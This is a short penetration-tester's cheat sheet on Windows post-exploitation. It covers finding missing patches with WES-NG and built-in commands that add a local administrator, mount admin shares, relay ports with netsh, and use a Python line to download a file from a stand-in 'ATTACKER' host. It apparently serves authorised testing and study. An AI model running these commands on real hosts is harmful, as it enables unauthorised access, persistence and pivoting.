Skip to content

Windows Exploits

Finding and exploiting missing patches and misconfigurations to gain or extend access on Windows hosts.

Why It Matters

Windows hosts in an environment are often behind on patches or carry legacy configurations. Identifying the exact patch level points straight at known vulnerabilities, and a handful of built-in commands cover most of what is needed to act on a foothold.

Reference

Finding Missing Patches

Windows Exploit Suggester (WES-NG) compares a host's patch level against known vulnerabilities.

wes.py --update                              # update the database
systeminfo > systeminfo.txt                  # on the target
wes.py systeminfo.txt                        # analyze offline

List installed hotfixes, newest first:

Get-HotFix | Sort-Object InstalledOn -Descending

Useful Built-in Commands

Task Command
Search files for a string ls -r C:\path -file \| % {Select-String -path $_ -pattern STRING}
Mount a remote share net use X: \IP\c$
Add a user net user <name> <password> /add
Add a user to local admins net localgroup Administrators <name> /add
Find files with a user's SID in the ACL icacls c:\*. /findsid <name> /t /c /l
TCP port forward relay netsh interface portproxy add v4tov6 listenport=<LPORT> listenaddress=0.0.0.0 connectport=<RPORT> connectaddress=<RHOST>

Simple File Transfer with Python

# download a file to the host
import urllib.request; urllib.request.urlretrieve("http://ATTACKER/file","C:\file")
# serve the current directory
python -m http.server 8000

How I Use It

After a foothold I capture systeminfo and run it through WES-NG offline, so I am not scanning the host live. Missing-patch findings get validated before firing anything. The built-in net and netsh commands cover most immediate needs (shares, users, pivoting) without dropping extra tools on the host.

Resources